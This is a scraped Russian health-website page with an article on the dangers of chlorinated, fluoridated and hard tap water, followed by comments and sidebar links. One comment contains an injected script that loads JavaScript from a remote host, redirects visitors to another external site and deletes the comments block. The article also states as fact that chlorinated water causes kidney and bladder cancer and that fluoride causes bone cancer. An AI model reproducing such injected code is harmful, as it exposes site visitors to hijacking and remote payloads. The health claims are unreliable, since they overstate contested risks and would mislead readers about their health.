Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какую воду мы пьем?  >>  Какую воду мы пьем?
 
Обратная связь
 

Какую воду мы пьем?

Размер шрифта
01 июня 2012 08:00
  • google_analytics: false
  • Нравится

Организм человека на 75 % состоит из воды. И за качеством воды стоит следить не менее тщательно, чем за качеством пищи. Без нее мы жить не можем. Какая она и на какие качества стоит обратить внимание?

1 

Способы обработки воды для центрального водоснабжения

  1. Хлорированная вода. Хлор – это способ обеззараживания воды. Подавляющее большинство населения получает воду через системы центрального водоснабжения. В этих системах вода проходит не только очистку, но и обеззараживание. Обеззараживание уже более века во всем мире проводится с помощью хлора. Хлор – отравляющее вещество первого класса – чрезвычайно токсичен для микроорганизмов.

Цель – обеззараживание воды – очень благородна. Но то, что смертельно для микробов, опасно и для нас. Сколько же хлора выпивает человек в течение жизни просто потому, что наша вода хлорированная? 15 кг за всю жизнь.

Чем опасен хлор?

  • Хлор старит и высушивает кожу. От частого умывания такой водой верхний слой кожи становится морщинистым, клетки кожи истончаются, питание нарушается.
  • Хлорированная вода вызывает рак почек и мочевого пузыря.
Что делать?
  • Этот летучий химический элемент почти полностью испаряется из водопроводной воды, если дать ей отстояться сутки или хотя бы 30 минут, прежде чем начать готовить.
  • Отстоявшуюся воду надо пропустить через фильтр для питьевой воды. Помните, что фильтрованная вода уязвима для микроорганизмов, поэтому не должна храниться дольше суток.
  1. Фторированная вода. Избыток природного фтора в питьевой воде есть в Ленинградской и Нижегородской области, Мордовии и Западной Сибири. В Западной Сибири повсеместно добывают алюминий. В производстве алюминия широко используется фтор. Много фтора попадает в воду.

Чем опасен фтор?

  • Как выяснилось, избыток фтора в питьевой воде приводит к тому, что фтор создает нерастворимые соединения с кальцием, оседающие на наших костях и зубах. От фторированной воды на зубах появляются пятна. Поражение зубов проявляется в виде мелких вкраплений желтого цвета. Это – флюороз.
  • Костная система так же страдает, так как фтор провоцирует остеосаркому, или рак костей.

Что делать?

  • Фильтр для очистки воды от фтора.
  • Потребление фтора, необходимого в разумных количествах, лучше контролировать специальными добавками.
  1. Жесткая вода. Чем выше в воде содержание солей кальция и магния, тем выше, так называемая, жесткость. Жесткой такую воду в начале прошлого века назвали из-за трудностей образования мыльной пены. В наши дни последствия при регулярном кипячении жесткой воды быстро образуется толстый слой желто-серой накипи в чайниках и кастрюлях. В российских регионах централизованное «смягчение» жесткой воды не производится. Еще несколько десятков лет назад считалось, что избыток солей в питьевой воде способен увеличивать вероятность образования камней в почках. И, хотя в наши дни, эта зависимость считается недоказанной, избыток солей всеми признается неблагоприятным фактором.

Чем опасна жесткая вода?

  • Употребление жесткой воды приводит к повышенному выделению солей в мочу. Но эпидемиологические исследования показали, что в регионах с жесткой водой заболеваемость мочекаменной болезнью не больше остальных. Так что прямого доказательства тому, что жесткая вода приводит к отложению камней, нет.
  • Но те же исследования показали, что у людей, пьющих жесткую воду, больше вероятности к отложению камней из-за высокой концентрации солей.
  • Портится бытовая техника, появляется толстый слой накипи. Стирка белых тканей в стиральной машине с накипью приводит к тому, что ткань становится серой.

Что делать?

  • Использовать фильтры для жесткой воды.
  • Длительное кипячение воды устраняет ее жесткость, но такая вода бедна вообще всеми, даже полезными элементами. Да и после кипячения ее следует еще и отстаивать не один час.
  • Использовать бутилированную питьевую воду.
  • Вода – самый важный и самый потребляемый пищевой компонент. Поэтому к качеству этого компонента следует отнестись с особым вниманием.

 

Сюжеты по теме:
Вода, которую мы пьем

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая природная вода для здоровья   Джакузи вызывают вспышки инфекций!   Чем мыть ребенка, чтобы не испортить его кожу   Сладкая вода помогает сконцентрироваться  
02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу 12 апреля 2013Ученые выяснили, из каких кружек лучше пить
 
21 декабря 2012Сладкая вода помогает сконцентрироваться 20 марта 2013А вы знаете, почему пальцы сморщиваются после пребывания в воде
 

Слайдшоу

1
5 причин выпить воды
Как сэкономить на воде зимой
7 чудес воды

Тесты

1
Что вы знаете о воде?
Что вы пьете?
Безопасна ли ваша кухня?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.